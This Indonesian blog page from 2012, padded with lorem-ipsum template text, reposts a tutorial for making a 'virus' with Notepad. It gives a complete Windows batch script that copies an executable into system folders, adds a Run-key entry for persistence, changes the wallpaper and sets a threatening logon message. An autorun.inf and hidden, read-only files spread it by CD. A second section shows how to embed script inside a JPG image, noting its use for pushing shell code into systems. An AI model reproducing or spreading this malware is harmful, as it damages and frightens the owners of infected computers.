Animasi n Sahring

Ads 468x60px

Giusto odio dignissimos

Giusto odio dignissimos

At vero eos et accusamus et iusto odio dignissimos ducimus qui blanditiis praesentium voluptatum deleniti atque corrupti quos dolores et quas molestias excepturi sint occaecati cupiditate non provident, similique sunt in culpa qui officia...

Read More
Omnis dolor repellendus

Omnis dolor repellendus

At vero eos et accusamus et iusto odio dignissimos ducimus qui blanditiis praesentium voluptatum deleniti atque corrupti quos dolores et quas molestias excepturi sint occaecati cupiditate non provident, similique sunt in culpa qui officia...

Read More
Olimpedit quo minus

Olimpedit quo minus

At vero eos et accusamus et iusto odio dignissimos ducimus qui blanditiis praesentium voluptatum deleniti atque corrupti quos dolores et quas molestias excepturi sint occaecati cupiditate non provident, similique sunt in culpa qui officia...

Read More
Itaque earum rerum

Itaque earum rerum

At vero eos et accusamus et iusto odio dignissimos ducimus qui blanditiis praesentium voluptatum deleniti atque corrupti quos dolores et quas molestias excepturi sint occaecati cupiditate non provident, similique sunt in culpa qui officia...

Read More
Epudiandae sint molestiae

Epudiandae sint molestiae

At vero eos et accusamus et iusto odio dignissimos ducimus qui blanditiis praesentium voluptatum deleniti atque corrupti quos dolores et quas molestias excepturi sint occaecati cupiditate non provident, similique sunt in culpa qui officia...

Read More
Sahut aut reiciendis

Sahut aut reiciendis

At vero eos et accusamus et iusto odio dignissimos ducimus qui blanditiis praesentium voluptatum deleniti atque corrupti quos dolores et quas molestias excepturi sint occaecati cupiditate non provident, similique sunt in culpa qui officia...

Read More

Selasa, 27 Maret 2012

Penetrasi Script ke Dalam Gambar

Cara Membuat virus Dengan Notepad - Di artikel kali ini utuy akan membahas tentang Cara Membuat virus Dengan Notepad. Buata sobat yang pengen nyoba atau cuma iseng buat virus dengan notepad nih utuy kasih tutorialnya. Virus ini memang efek gak terlalu bahaya efeknya yaitu cuma mengganti tampilan dari windows, tapi mungkin bikin cukup kanget juga'!!! dan anehnya gak ke-detect sama antivirus [setahu saya]. Ok sobat gak usah lama-lama deh langsung saja nih cara nya. Cara Membuat virus Dengan Notepad Buka Notepadnya lalu copy script dibawah ini @echo off copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f Lalu di "SAVE ALL FILE" dengan extensi .bat (nama_file.bat) Buat Autorun.inf dengan script [autorun] open=nama_file.bat Lalu di "SAVE ALL FILE" dengan extensi .inf (Autorun.inf) File -file tersebut harus dalam 1 direktori, lalu seleksi file-file tersebut dengan cara klik kanan pilih Properties beri tanda check pada Hidden dan Read-Only Copy file-file tersebut ke CD Nikmati efeknya

Original Article from: http://utuy-semrawut.blogspot.com/2012/02/cara-membuat-virus-dengan-notepad.html
Copyright Utuy-Semrawut
 Sahabat, pasti sudah sering mendengar trik memasukkan/menamkan tulisan, script atau code ke dalam sebuah gambar. Jadi sepintas seperti gambar biasa, tetapi di dalamnya tertanam sebuah tulisan, terus apa fungsinya? Bagi seorang hacker terkadang trik in berguna untuk penetrasi shells code ke dalam system/root. Tetapi bagi kamu yang tidak beraktifitas dalam dunia hacking, cara ini bisa untuk menyembunyikan dokumen/tulisan yang sifatnya rahasia. Cara ini menggunkan tool yang cukup lama, namanya edjpgcom.exe, mungkin sudah tidak asing lagi, hanya saja untuk beberapa orang menggunakan tool ini agak sulit, karena harus melibatkan command prompt. Tapi bagi kamu yang sudah jago atau setidaknya mengerti command prompt tidak masalah menggunakan tool ini.  Disini saya coba membuat tools pendukung edjpgcom.exe yang menghilangkan kata sulit tersebut. Langkahnya:
1. Download toolnya.
2. Extract di drive D atau E.
3. Akan ada 3 buah file, edjpgcom.exe, gambar.jpg, dan pubercity.exe
4. edjpgcom.exe adalah tools utama, gambar.jpg adalah gambar yang akan kamu tanami tulisan/script dan pubercity.exe adalah tools pendukung yang saya buat untuk mempermudah penetrasi tulisan.
5. Gambar kamu harus diberi nama gambar.jpg
Langsung praktik saja ya.
1. Letakkan 3 file pada drive D atau E, kita praktik di drive E.
2. Jalankan pubercity.exe, karena file kita letakkan di drive E, maka ketik angka 3 dan tekan enter.


3. Masukkan tulisan/script dan OK.


 
4. Tulisan/script telah berhasil ditanam.
Untuk melihat keberhasilan, buka file gambar.jpg dengan notepad, rekomendasi dengan notepad ++, setelah berhasil rename gambar.jpg sesuai keinginan kamu

Tidak ada komentar:

Poskan Komentar

Widgeo